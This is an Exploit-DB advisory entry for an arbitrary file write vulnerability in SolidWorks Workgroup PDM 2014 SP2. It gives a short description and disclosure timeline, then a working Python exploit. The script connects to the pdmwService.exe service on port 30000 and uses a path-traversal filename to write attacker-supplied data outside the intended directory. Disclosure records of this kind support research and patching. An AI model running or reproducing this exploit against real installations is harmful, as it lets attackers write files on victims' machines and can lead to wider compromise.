SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write

EDB-ID:

31831




Platform:

Windows

Date:

2014-02-22


'''
# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability
# Date: 2-21-2014
# Author: Mohamed Shetta
Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
# Tested on: Windows 7
#Vulnerability type: Arbitrary File Write
#Vulnerable file: pdmwService.exe
#PORT: 30000


---------------------------------------------------------------------------------------------------------
Software Description:

SolidWorks
Workgroup PDM is a PDM tool that allows SolidWorks users operating in 
teams of 10 members or less to work on designs concurrently. With 
SolidWorks PDM Workgroup, designers can search, revise, and vault CAD 
data while maintaining an accurate design history.


---------------------------------------------------------------------------------------------------------
Vulnerability Details:

This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of SolidWorks Workgroup PDM.

------------------------------------------------------------------------------------------------------------
Disclosure timeline:

12/15/2013 - Vendor notified and no response.
2/21/2014 - Public disclosure
'''

#!/usr/bin/env python
  
import socket
import struct
import ctypes

FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test
Data="A"*1028
FileSize=len(Data)
FNsz=len(FileName)
OpCode="\xD0\x07\x00\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 30000))
s.send(OpCode)
s.send(struct.pack("I", FNsz))
s.send(FileName)
s.send(struct.pack('<Q', FileSize))
s.send(Data)